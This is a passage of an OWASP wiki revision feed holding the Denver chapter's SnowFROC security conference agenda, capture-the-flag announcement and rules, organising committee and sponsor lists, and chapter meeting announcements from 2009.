 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:50-14:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Byrne|&amp;quot;Automated vs. Manual Security: You can't filter The Stupid&amp;quot;]]&lt;br /&gt;
''David Byrne &amp;amp; Charles Henderson, Trustwave''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=7611144342490803641 Video]&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Damele|&amp;quot;SQL injection: Not only AND 1=1&amp;quot;]]&lt;br /&gt;
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=129190988572738701 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 14:50-15:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
|-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:00-15:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Neucom|&amp;quot;Security Policy Management: Best Practices for Web Services and Application Security&amp;quot;]]&lt;br /&gt;
''Ray Neucom, IBM''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=-4972597638535731442 Video]&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Cornell_Dickson_Abstract|&amp;quot;Vulnerability Management in an Application Security World&amp;quot;]]&lt;br /&gt;
''Dan Cornell &amp;amp; John Dickson, Denim Group''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=8588268474844052248 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:50-16:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Panel: Emerging Threats and Enterprise Countermeasures&lt;br /&gt;
Moderator: John Dickson&amp;lt;br/&amp;gt;&lt;br /&gt;
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 16:30-17:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Conference Wrap Up, CTF Awards &amp;amp; Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 17:30-21:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | OWASP Social Gathering: Dinner and Drinks @ TBD&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
--&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Capture the Flag (CTF)====&lt;br /&gt;
&lt;br /&gt;
This year FROC will again be hosting a capture the flag game / contest throughout the day.&lt;br /&gt;
&lt;br /&gt;
ctf.technowarfare.com&lt;br /&gt;
&lt;br /&gt;
Must use aurariacampus SSID to get in.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 If you need help with the CTF please contact eduprey at owasp dot org. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- CTF is OPEN!&lt;br /&gt;
&lt;br /&gt;
If you are attending FROC, join WiFi network &amp;quot;Auraria Campus&amp;quot; and browse to [http://ctf.technowarfare.com the CTF main page].  If you need help, email edupreyATowasp.org or visit the CTF lounge upstairs from the vendor area.&lt;br /&gt;
&lt;br /&gt;
This year FROC will be hosting a capture the flag game / contest throughout the day. The CTF consists of a LAMP web server target and a scoreboard. &lt;br /&gt;
&lt;br /&gt;
Your job as a player is to successfully attack the small vulnerable web applications we provide to obtain hidden codes (called &amp;quot;flags&amp;quot;.)  Enter a flag into the scoreboard and you're credited with the point value for that challenge.&lt;br /&gt;
&lt;br /&gt;
An entrant can be a team or an individual.  Small prizes will be given for the top three finishing entrants, but the greatest prize, of course, is bragging rights.  Winners will be announced (and prizes awarded) at the end of the conference as part of the conference wrap-up.&lt;br /&gt;
&lt;br /&gt;
Thanks to:&lt;br /&gt;
&lt;br /&gt;
*IBM for sponsoring this event and providing technical support.&lt;br /&gt;
*Dan Guido and the rest of the team of students from Polytechnic University for developing the code the contest is based on. (this CTF is a modified version of the one they presented at OWASP NYC 2008)&lt;br /&gt;
&lt;br /&gt;
===CTF Rules===&lt;br /&gt;
&lt;br /&gt;
1. Don't attack other players.  The contest is about finding and exploiting vulnerabilities in the applications provided.  (yes, attacking application users is a real-world threat -- victims will be provided in the challenges where attacking a user is required.)&lt;br /&gt;
&lt;br /&gt;
2. Don't attack the infrastructure.  Networks, routers, and the scoreboard are all off-limits as targets of attack.&lt;br /&gt;
&lt;br /&gt;
Anyone discovered breaking these rules will earn banning, forfeiture of all points, and very bad karma.&lt;br /&gt;
&lt;br /&gt;
--&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Conference Committee====&lt;br /&gt;
&lt;br /&gt;
FROC 2010 Planning Committee Chair: Kathy Thaxton -  kthaxton at owasp dot org&lt;br /&gt;
&lt;br /&gt;
Presentation Selection Committee:&lt;br /&gt;
* Mark Bristow - OWASP Global Conference Committee&lt;br /&gt;
* David Campbell - OWASP Denver&lt;br /&gt;
* Eric Duprey - OWASP Denver&lt;br /&gt;
* Chris Hoff - Cloud Security Alliance&lt;br /&gt;
* Eoin Keary - Chair, OWASP Global Conference Committee&lt;br /&gt;
* Michael Sutton - Cloud Security Alliance&lt;br /&gt;
* Jim Reavis - Cloud Security Alliance&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Colorado Chapter Hosts:&lt;br /&gt;
* David Campbell - OWASP Denver - dcampbell at owasp dot org&lt;br /&gt;
* Eric Duprey - OWASP Denver - eduprey at owasp dot org&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vendor Exhibition POC: Kathy Thaxton - kthaxton at owasp dot org&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Capture the Flag POC: Eric Duprey - eduprey at owasp dot org&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Conference Sponsors====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following organizations are proud sponsors of this conference:&lt;br /&gt;
&amp;lt;!-- &lt;br /&gt;
*Accuvant&lt;br /&gt;
*Breach&lt;br /&gt;
*Business Partner Solutions&lt;br /&gt;
*Denim Group&lt;br /&gt;
*Fishnet Security&lt;br /&gt;
*IBM&lt;br /&gt;
*Imperva&lt;br /&gt;
*Laz&lt;br /&gt;
*Lares&lt;br /&gt;
*Trustwave&lt;br /&gt;
*WhiteHat Security --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*[http://www.accuvant.com/ Accuvant]&lt;br /&gt;
*[http://www.denimgroup.com/ Denim Group]&lt;br /&gt;
*[http://www.fortify.com/ Fortify Software]&lt;br /&gt;
*[http://www.hosting.com/ Hosting.com]&lt;br /&gt;
*[http://www.whitehatsec.com/home/index.html Whitehat Security]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
If you are interested in sponsoring this OWASP event, please contact Kathy Thaxton at kthaxton at owasp dot org.&lt;br /&gt;
&lt;br /&gt;
Logistics information for sponsors is available [[FROC2010 Sponsor Info|here]]&lt;br /&gt;
&lt;br /&gt;
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP AppSec Conference]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Twitter Feed====&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;border: 1px solid rgb(204, 204, 204); width: 100%; font-size: 95%; color: rgb(0, 0, 0); background-color: rgb(236, 236, 236);&amp;quot; | &lt;br /&gt;
Use the '''[http://search.twitter.com/search?q=%23FROC #FROC]''' hashtag for your tweets (What are [http://hashtags.org/ hashtags]?) &lt;br /&gt;
&lt;br /&gt;
'''@OWASP303 Twitter Feed ([http://twitter.com/OWASP303 follow us on Twitter!])'''&lt;br /&gt;
&amp;lt;twitter&amp;gt;55021150&amp;lt;/twitter&amp;gt; &lt;br /&gt;
&lt;br /&gt;
| style=&amp;quot;width: 110px; font-size: 95%; color: rgb(0, 0, 0);&amp;quot; | &lt;br /&gt;
|} &lt;br /&gt;
&lt;br /&gt;
NOTE: Twitter integration is temporarily disabled, check back soon for updates!&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- &amp;lt;hr&amp;gt;&lt;br /&gt;
&amp;lt;paypal&amp;gt;Denver&amp;lt;/paypal&amp;gt; --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;headertabs /&amp;gt;&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Denver&amp;diff=60767</id>
		<title>Denver</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Denver&amp;diff=60767"/>
				<updated>2009-05-14T15:39:47Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: /* Future Meetings */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Chapter Template|chaptername=Denver|extra=Chapter leaders are [mailto:eduprey@gmail.com Eric Duprey] and [mailto:dcampbell@owasp.org David Campbell].   |mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-denver|emailarchives=http://lists.owasp.org/pipermail/owasp-denver}}&lt;br /&gt;
&lt;br /&gt;
==== Local News ====&lt;br /&gt;
&amp;lt;paypal&amp;gt;Denver&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
== SnowFROC 2009 Survey ==&lt;br /&gt;
Thanks to everybody who made SnowFROC 2009 a standing room only success!!&lt;br /&gt;
&lt;br /&gt;
Thanks to those of you who completed the Survey.  [http://www.owasp.org/images/c/ce/SnowFROC_Survey_Results.pdf Survey results].&lt;br /&gt;
&lt;br /&gt;
Videos from the event are [[Front_Range_OWASP_Conference_2009#Agenda_and_Presentations:_5_March_2009|now online]].&lt;br /&gt;
&lt;br /&gt;
==Questions, Comments==&lt;br /&gt;
Questions can be directed to &lt;br /&gt;
*David Campbell, Denver OWASP: dcampbell 'at' owasp.org&lt;br /&gt;
*Eric Duprey, Denver OWASP: eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
== Mailing List ==&lt;br /&gt;
Join the [http://lists.owasp.org/mailman/listinfo/owasp-denver OWASP Denver Mailing List] to receive meeting notifications via email&lt;br /&gt;
&lt;br /&gt;
==== Chapter Meetings ====&lt;br /&gt;
&lt;br /&gt;
We are still recovering from [[Front_Range_OWASP_Conference_2009|SnowFROC]].  Videos from SnowFROC are [[Front_Range_OWASP_Conference_2009#Agenda_and_Presentations:_5_March_2009|now online]].  Our next meeting is tentatively planned for Wednesday 20 May 2009.  Watch this space for details.&lt;br /&gt;
&lt;br /&gt;
== Future Meetings == &lt;br /&gt;
[[Denver May 2009 meeting|May 2009: Dr. Joseph McComb &amp;amp; and Daniel Weiske: Compliance and application security testing]]&lt;br /&gt;
&lt;br /&gt;
== Past Meetings ==&lt;br /&gt;
&lt;br /&gt;
[[Front_Range_OWASP_Conference_2009|March 2009: Front Range OWASP Conference (SnowFROC)]]&lt;br /&gt;
&lt;br /&gt;
[[Denver January 2009 meeting|January 2009: David Campbell &amp;amp; Eric Duprey: Guided Tour: AppSec NYC '08 CTF]]&lt;br /&gt;
&lt;br /&gt;
[[Denver October 2008 meeting|October 2008: Alex Smolen: The OWASP ASP .NET ESAPI]]&lt;br /&gt;
&lt;br /&gt;
[[Denver September 2008 meeting|September 2008: John Dickson: Black Box vs. White Box: Different App Testing Strategies]]&lt;br /&gt;
&lt;br /&gt;
[[Denver August 2008 meeting|August 2008: Dan Cornell: Static Analysis]]&lt;br /&gt;
&lt;br /&gt;
[[Denver July 2008 meeting|July 2008: David Byrne &amp;amp; Eric Duprey: Grendel-Scan]]&lt;br /&gt;
&lt;br /&gt;
[[Front Range OWASP Conference|June 2008: Front Range OWASP Conference: Jeremiah Grossman, Robert Hansen, and more!]]&lt;br /&gt;
&lt;br /&gt;
[[Denver May 2008 meeting|May 2008: David Campbell &amp;amp; Eric Duprey: XSS Attacks &amp;amp; Defenses]]&lt;br /&gt;
&lt;br /&gt;
[[Denver April 2008 meeting|April 2008: Ryan Barnett: Virtual Patching with ModSecurity]]&lt;br /&gt;
&lt;br /&gt;
[[Denver February 2008 meeting|February 2008: Michael Sutton: SQL Injection Revisited]]&lt;br /&gt;
&lt;br /&gt;
[[Denver June 2007 meeting|June 2007]]&lt;br /&gt;
&lt;br /&gt;
[[Denver April 2007 meeting|April 2007]]&lt;br /&gt;
&lt;br /&gt;
[[Denver February 2007 meeting|February 2007]]&lt;br /&gt;
&lt;br /&gt;
[[Denver January 2007 meeting|January 2007]]&lt;br /&gt;
&lt;br /&gt;
[[Denver November 2006 meeting|November 2006]]&lt;br /&gt;
&lt;br /&gt;
==[[Related_Organizations|Local Organizations of Interest]]==&lt;br /&gt;
&lt;br /&gt;
==== Denver OWASP Chapter Leaders ====&lt;br /&gt;
*David Campbell, Denver OWASP: dcampbell 'at' owasp.org&lt;br /&gt;
*Eric Duprey, Denver OWASP: eduprey 'at' exploits.org&lt;br /&gt;
==Chapter Management Links==&lt;br /&gt;
[[Pizza|Best pizza in Centennial]]&lt;br /&gt;
__NOTOC__&lt;br /&gt;
&amp;lt;headertabs/&amp;gt;&lt;br /&gt;
[[Category:Colorado]]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Denver_May_2009_meeting&amp;diff=60766</id>
		<title>Denver May 2009 meeting</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Denver_May_2009_meeting&amp;diff=60766"/>
				<updated>2009-05-14T15:38:05Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: New page: == Wednesday 20 May 2009, 6pm @ RPSC ==  === Topic: Compliance and application security testing ===  Presenters: Dr. Joseph McComb, CISSP, CISA, G7799, CHSS and Daniel Weiske, CISSP, CISA,...&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Wednesday 20 May 2009, 6pm @ RPSC ==&lt;br /&gt;
&lt;br /&gt;
=== Topic: Compliance and application security testing ===&lt;br /&gt;
&lt;br /&gt;
Presenters: Dr. Joseph McComb, CISSP, CISA, G7799, CHSS and Daniel Weiske, CISSP, CISA, CAP, NSA-IAM&lt;br /&gt;
&lt;br /&gt;
Title:  Compliance while under siege: justifying security spending for the holes in your defenses.&lt;br /&gt;
&lt;br /&gt;
Synopsis:  This presentation will show how to integrate a compliance framework into application security testing to produce an effective mechanism for presenting risk. Regulations, including security breach notification legislation, HIPAA, FISMA and other regulations specify penalties for failing to safeguard specific types of information. This presentation will demonstrate how to weave regulatory frameworks into the application testing process and how to quantify risk based upon penalties and ease of exploitation.  Using real world examples, the presenters will show how this methodology can be used to justify security testing as a necessary expenditure for a secure environment.&lt;br /&gt;
&lt;br /&gt;
=== Agenda ===&lt;br /&gt;
* 6pm: Pizza &amp;amp; pop @ RPSC, courtesy of Corporate Sponsors [http://www.fishnetsecurity.com/ FishNet Security]&lt;br /&gt;
* 6:30pm: Introduction and Chapter business&lt;br /&gt;
* 6:45pm --&amp;gt; 8pm: Presentation&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[https://www.owasp.org/index.php/Denver Back to OWASP Denver]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&amp;diff=56168</id>
		<title>Front Range OWASP Conference 2009</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&amp;diff=56168"/>
				<updated>2009-03-05T16:09:26Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Image:SnowFROCblue.jpg]]&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Welcome to SnowFROC, the Winter 2009 Front Range OWASP Application Security Conference!&lt;br /&gt;
&lt;br /&gt;
After a successful FROC in June of 2008, we are back in Denver, Colorado USA on 5 March 2009! &lt;br /&gt;
&lt;br /&gt;
'''This year we again present a full day, FREE multi-track conference, which will provide valuable information for managers and executives as well as developers and engineers.'''&lt;br /&gt;
&lt;br /&gt;
In 2008, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2009.  This year we organized the conference to occur during the peak of the [http://www.google.com/search?q=colorado+skiing Colorado ski season], so that speakers can head up to the nearby mountains before and/or after the conference to enjoy some of the legendary snow.&lt;br /&gt;
&lt;br /&gt;
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Conference Location==&lt;br /&gt;
[[Image:Denver_mountains.JPG]]&lt;br /&gt;
&lt;br /&gt;
This year, the conference will be held at the [http://maps.google.com/maps?hl=en&amp;amp;ie=UTF8&amp;amp;cid=0,0,17887458453474608109&amp;amp;fb=1&amp;amp;split=1&amp;amp;gl=us&amp;amp;dq=Tivoli+Student+Union+in+downtown+Denver,+CO&amp;amp;daddr=900+Auraria+Pkwy+%23+325E,+Denver,+CO+80204&amp;amp;geocode=2315206160437382962,39.746366,-105.007463&amp;amp;ei=jKOsSeKrM5O5twfLh4GDBg&amp;amp;z=16 Tivoli Student Union] in downtown 900 Auraria Pkwy # 325E&lt;br /&gt;
Denver, CO 80204 (303) 556-6330&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Call for Presentations==&lt;br /&gt;
The [[Front_Range_OWASP_Conference_2009_CFP|call for papers]] closed on 6 Feb 09.  We received a tremendous response.  Thanks to everybody who responded!&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ===[[SnowFROC Tentative Schedule]]=== --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Agenda and Presentations: 5 March 2009==&lt;br /&gt;
&lt;br /&gt;
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;width:80%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | March 5, 2009&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 07:30-08:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Registration and Continental Breakfast in the Sponsor Expo Room&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:30-08:35 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Welcome to SnowFROC AppSec 2009 Conference &lt;br /&gt;
''David Campbell, OWASP Denver''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:35-09:45 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Keynote: [[SnowFROC_Abstract_Grossman|&amp;quot;Top Ten Web Hacking Techniques of 2008: What's possible, not probable&amp;quot;]]&lt;br /&gt;
''Jeremiah Grossman, Whitehat Security''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 09:45-10:15 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | OWASP State of the Union&lt;br /&gt;
''Tom Brennan, OWASP Board''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:15-10:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:30-11:15 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]&amp;quot;&lt;br /&gt;
''Ed Bellis, Orbitz''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Zusman|&amp;quot;Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations&amp;quot;]]&lt;br /&gt;
''Mike Zusman, Intrepidus Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:15-12:00 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Paller|&amp;quot;A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors&amp;quot;]]&lt;br /&gt;
''Alan Paller, SANS''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Stads|&amp;quot;Adobe Flex, AMF 3 and BlazeDS: An Assessment&amp;quot;]] &lt;br /&gt;
''Kevin Stadmeyer, Trustwave''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 12:00-13:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:00-13:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Peloquin|&amp;quot;Building an Effective Application Security Program&amp;quot;]]&lt;br /&gt;
''Joey Peloquin, Fishnet Security''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Belani|&amp;quot;Bad Cocktail: Spear Phishing + Application Hacks&amp;quot;]]&lt;br /&gt;
''Rohyt Belani, Intrepidus Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:50-14:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Byrne|&amp;quot;Automated vs. Manual Security: You can't filter The Stupid&amp;quot;]]&lt;br /&gt;
''David Byrne &amp;amp; Charles Henderson, Trustwave''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Damele|&amp;quot;SQL injection: Not only AND 1=1&amp;quot;]]&lt;br /&gt;
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 14:50-15:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
|-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:00-15:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Neucom|&amp;quot;Security Policy Management: Best Practices for Web Services and Application Security&amp;quot;]]&lt;br /&gt;
''Ray Neucom, IBM''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Cornell_Dickson_Abstract|&amp;quot;Vulnerability Management in an Application Security World&amp;quot;]]&lt;br /&gt;
''Dan Cornell &amp;amp; John Dickson, Denim Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:50-16:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Panel: Emerging Threats and Enterprise Countermeasures&lt;br /&gt;
Moderator: John Dickson&amp;lt;br/&amp;gt;&lt;br /&gt;
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 16:30-17:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Conference Wrap Up, CTF Awards &amp;amp; Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 17:30-21:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | OWASP Social Gathering: Dinner and Drinks @ TBD&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Capture the Flag (CTF)==&lt;br /&gt;
&lt;br /&gt;
CTF is OPEN!&lt;br /&gt;
&lt;br /&gt;
If you are attending FROC, join WiFi network &amp;quot;Auraria Campus&amp;quot; and browse to [http://ctf.technowarfare.com the CTF main page].  If you need help, email edupreyATowasp.org or visit the CTF lounge upstairs from the vendor area.&lt;br /&gt;
&lt;br /&gt;
This year FROC will be hosting a capture the flag game / contest throughout the day. The CTF consists of a LAMP web server target and a scoreboard. &lt;br /&gt;
&lt;br /&gt;
Your job as a player is to successfully attack the small vulnerable web applications we provide to obtain hidden codes (called &amp;quot;flags&amp;quot;.)  Enter a flag into the scoreboard and you're credited with the point value for that challenge.&lt;br /&gt;
&lt;br /&gt;
An entrant can be a team or an individual.  Small prizes will be given for the top three finishing entrants, but the greatest prize, of course, is bragging rights.  Winners will be announced (and prizes awarded) at the end of the conference as part of the conference wrap-up.&lt;br /&gt;
&lt;br /&gt;
Thanks to:&lt;br /&gt;
&lt;br /&gt;
*IBM for sponsoring this event and providing technical support.&lt;br /&gt;
*Dan Guido and the rest of the team of students from Polytechnic University for developing the code the contest is based on. (this CTF is a modified version of the one they presented at OWASP NYC 2008)&lt;br /&gt;
&lt;br /&gt;
===CTF Rules===&lt;br /&gt;
&lt;br /&gt;
1. Don't attack other players.  The contest is about finding and exploiting vulnerabilities in the applications provided.  (yes, attacking application users is a real-world threat -- victims will be provided in the challenges where attacking a user is required.)&lt;br /&gt;
&lt;br /&gt;
2. Don't attack the infrastructure.  Networks, routers, and the scoreboard are all off-limits as targets of attack.&lt;br /&gt;
&lt;br /&gt;
Anyone discovered breaking these rules will earn banning, forfeiture of all points, and very bad karma.&lt;br /&gt;
&lt;br /&gt;
==Logistics==&lt;br /&gt;
&lt;br /&gt;
